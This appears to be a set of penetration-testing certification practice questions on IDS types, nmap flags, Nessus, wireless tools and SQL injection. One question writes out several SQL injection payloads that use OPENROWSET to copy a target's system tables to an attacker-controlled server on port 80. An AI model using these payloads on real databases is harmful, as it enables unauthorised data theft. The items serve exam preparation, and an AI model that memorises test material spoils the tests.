What is a difference between host-based intrusion detection systems (HIDS) and network-based intrusion detection systems (NIDS)?
A. NIDS are usually a more expensive solution to implement compared to HIDS.
B. Attempts to install Trojans or backdoors cannot be monitored by a HIDS whereas NIDS can monitor and stop such intrusion events.
C. NIDS are standalone hardware appliances that include network intrusion detection capabilities whereas HIDS consist of software agents installed on individual computers within the system.
D. HIDS requires less administration and training compared to NIDS.
Identify the correct formula for Return on Investment (ROI).
A. ROI = ((Expected Returns - Cost of Investment) / Cost of Investment) * 100
B. ROI = (Expected Returns + Cost of Investment) / Cost of Investment
C. ROI = (Expected Returns - Cost of Investment) / Cost of Investment
D. ROI = ((Expected Returns + Cost of Investment) / Cost of Investment) * 100
Which of the following pen testing reports provides detailed information about all the tasks performed during penetration testing?
A. Client-Side Test Report
B. Activity Report
C. Host Report
D. Vulnerability Report
Which of the following scan options is able to identify the SSL services?
A. sS
B. sV
C. sU
D. sT
A SQL injection attack consists of the insertion or "injection" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application.
A successful SQL injection attack can:
i) Read sensitive data from the database
ii) Modify database data (insert/update/delete)
iii) Execute administration operations on the database (such as shutting down the DBMS)
iv) Recover the content of a given file existing on the DBMS file system or write files into the file system
v) Issue commands to the operating system
A pen tester needs to perform various tests to detect a SQL injection vulnerability. He has to make a list of all input fields whose values could be used in crafting a SQL query, including the hidden fields of POST requests, and then test them separately, trying to interfere with the query and to generate an error.
In which of the following tests is the source code of the application tested in a non-runtime environment to detect the SQL injection vulnerabilities?
A. Automated Testing
B. Function Testing
C. Dynamic Testing
D. Static Testing
A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine via a connection to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1
What query does he need in order to transfer the column?
A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables
B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows
C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns
D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns
Assessing a network from a hacker's point of view to discover the exploits and vulnerabilities that are accessible to the outside world is which sort of vulnerability assessment?
A. Network Assessments
B. Application Assessments
C. Wireless Network Assessments
D. External Assessment
Nessus can test a server or a network for DoS vulnerabilities. Which one of the following scripts tries to kill a service?
A. ACT_DENIAL
B. ACT_FLOOD
C. ACT_KILL_HOST
D. ACT_ATTACK
Which one of the following is a supporting tool for 802.11 (wireless) packet injection that spoofs 802.11 packets to verify whether the access point is valid or not?
A. Airsnort
B. Aircrack
C. Airpwn
D. WEPCrack
Logs are the record of system and network activities. The Syslog protocol is used for delivering log information across an IP network. Syslog messages can be sent via which one of the following?
A. UDP and TCP
B. TCP and SMTP
C. SMTP
D. UDP and SMTP